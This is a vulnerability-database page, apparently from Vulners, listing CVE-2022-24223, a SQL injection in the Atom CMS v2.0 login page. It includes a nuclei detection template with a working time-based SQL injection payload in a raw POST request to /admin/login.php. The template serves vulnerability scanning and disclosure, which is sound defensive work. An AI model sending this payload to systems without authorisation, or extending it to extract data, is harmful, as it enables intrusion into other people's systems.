Lucene search
K

Atom CMS v2.0 - SQL Injection

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

Atom CMS v2.0 SQL Injection via /admin/login.php. Exploitation could lead to unauthorized access, data leakage, or data manipulation. Fixed in Atom CMS v2.1

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
AtomCMS v2.0 - SQL injection Vulnerability
9 Feb 202200:00
zdt
ATTACKERKB
CVE-2022-24223
1 Feb 202219:15
attackerkb
Circl
CVE-2022-24223
1 Feb 202222:26
circl
CNNVD
Atom CMS SQL注入漏洞
1 Feb 202200:00
cnnvd
Check Point Advisories
AtomCMS SQL Injection (CVE-2022-24223)
2 Nov 202200:00
checkpoint_advisories
CVE
CVE-2022-24223
1 Feb 202218:36
cve
Cvelist
CVE-2022-24223
1 Feb 202218:36
cvelist
Exploit DB
AtomCMS v2.0 - SQLi
9 Feb 202200:00
exploitdb
NVD
CVE-2022-24223
1 Feb 202219:15
nvd
OSV
CVE-2022-24223
1 Feb 202219:15
osv
Rows per page
id: CVE-2022-24223

info:
  name: Atom CMS v2.0 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: Fixed in version Atom CMS v2.1
  reference:
    - https://packetstormsecurity.com/files/165922/Atom-CMS-2.0-SQL-Injection.html
    - https://github.com/thedigicraft/Atom.CMS/issues/255
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24223
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/Enes4xd/Enes4xd
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24223
    cwe-id: CWE-89
    epss-score: 0.61965
    epss-percentile: 0.99071
    cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: thedigitalcraft
    product: atomcms
  tags: time-based-sqli,cve,cve2022,packetstorm,sqli,atom,cms,thedigitalcraft,vuln

http:
  - raw:
      - |
        @timeout: 10s
        POST /admin/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        email={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(body, "Admin Login") && contains(body, "Atom.SaveOnBlur")'
        condition: and
# digest: 490a00463044022000f6da4a85830c2febd9edcdae35402848e17bafa0574521f813d14b13f1e36902207981ee0858455b0c33f5714360020523e0a6e835ff2643986281eaac72b212b2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
CVSS 3.19.8
EPSS0.61965
30